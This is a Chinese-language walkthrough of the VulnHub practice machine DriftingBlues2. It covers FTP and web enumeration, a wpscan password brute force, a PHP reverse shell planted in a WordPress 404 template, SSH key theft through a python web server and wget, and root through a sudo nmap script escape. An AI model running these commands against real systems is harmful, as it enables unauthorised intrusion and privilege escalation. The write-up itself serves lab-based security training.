vulnhub靶场渗透实战12-driftingblues2

vbox导入,网络桥接。

靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues2.ova

一:信息收集

1;主机发现。

vulnhub靶场渗透实战12-driftingblues2

2;开放服务端口。ftp匿名登录。

vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2

3;ftp匿名登录的一张图片。

vulnhub靶场渗透实战12-driftingblues2

4;把图片复制到kali里面,利用工具steghide查看一下图片里的信息,需要密码,emmmm,什么都没有。

vulnhub靶场渗透实战12-driftingblues2

5;没发现其他,我们目录遍历一下。

vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2

nikto -h http://192.168.1.23  新扫描目标站点下有无目录的工具

vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2

6;一个登录框。添加本地host,因为/blog源码里面有个域名。

192.168.1.23driftingblues.box

vulnhub靶场渗透实战12-driftingblues2


6;一个登录框。添加本地host,因为/blog源码里面有个域名。by albert?可能是用户名。

192.168.1.23driftingblues.box,在hosts添加。

vulnhub靶场渗透实战12-driftingblues2


vulnhub靶场渗透实战12-driftingblues2


那就用wp-scan工具扫描一下有没有用户名或者可利用的插件。确定是albert是用户名。

wpscan --url http://192.168.1.23/blog/ -e u 

vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2

7;爆破一下这个用户的密码。albert/scotland1

wpscan --url http://192.168.1.23/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert

vulnhub靶场渗透实战12-driftingblues2

8;登录成功。

vulnhub靶场渗透实战12-driftingblues2


二;漏洞利用

1;往404页面写个PHPshell进去,保存,凯莉开启监听,访问一个不存在的路径。

vulnhub靶场渗透实战12-driftingblues2

2;监听成功。升级一下shell。

vulnhub靶场渗透实战12-driftingblues2

3;在home目录下发现一个freddie用户,还发现了.ssh的文件,进入 .ssh 文件夹,发现存在公私钥信息文件,且私钥文件可读可执行。

vulnhub靶场渗透实战12-driftingblues2

可以直接复制粘贴到文件上去。

vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2

也可以开服务,卡莉下载私钥文件。

python2 -m SimpleHTTPServer 9998
wget http://192.168.1.23:9998/id_rsa 

vulnhub靶场渗透实战12-driftingblues2


4;利用私钥文件,登录freddie用户,

vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2

5;看到有root权限,nmap提权。提权成功,两个flag。

https://gtfobins.github.io/查找nmap

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2


vulnhub靶场渗透实战12-driftingblues2

vulnhub靶场渗透实战12-driftingblues2

​使用 python 切换 bash:python3 -c 'import pty; pty.spawn("/bin/bash")'

vulnhub靶场渗透实战12-driftingblues2

© 版权声明
好牛新坐标
版权声明:
1、IT大王遵守相关法律法规,由于本站资源全部来源于网络程序/投稿,故资源量太大无法一一准确核实资源侵权的真实性;
2、出于传递信息之目的,故IT大王可能会误刊发损害或影响您的合法权益,请您积极与我们联系处理(所有内容不代表本站观点与立场);
3、因时间、精力有限,我们无法一一核实每一条消息的真实性,但我们会在发布之前尽最大努力来核实这些信息;
4、无论出于何种目的要求本站删除内容,您均需要提供根据国家版权局发布的示范格式
《要求删除或断开链接侵权网络内容的通知》:https://itdw.cn/ziliao/sfgs.pdf,
国家知识产权局《要求删除或断开链接侵权网络内容的通知》填写说明: http://www.ncac.gov.cn/chinacopyright/contents/12227/342400.shtml
未按照国家知识产权局格式通知一律不予处理;请按照此通知格式填写发至本站的邮箱 wl6@163.com

相关文章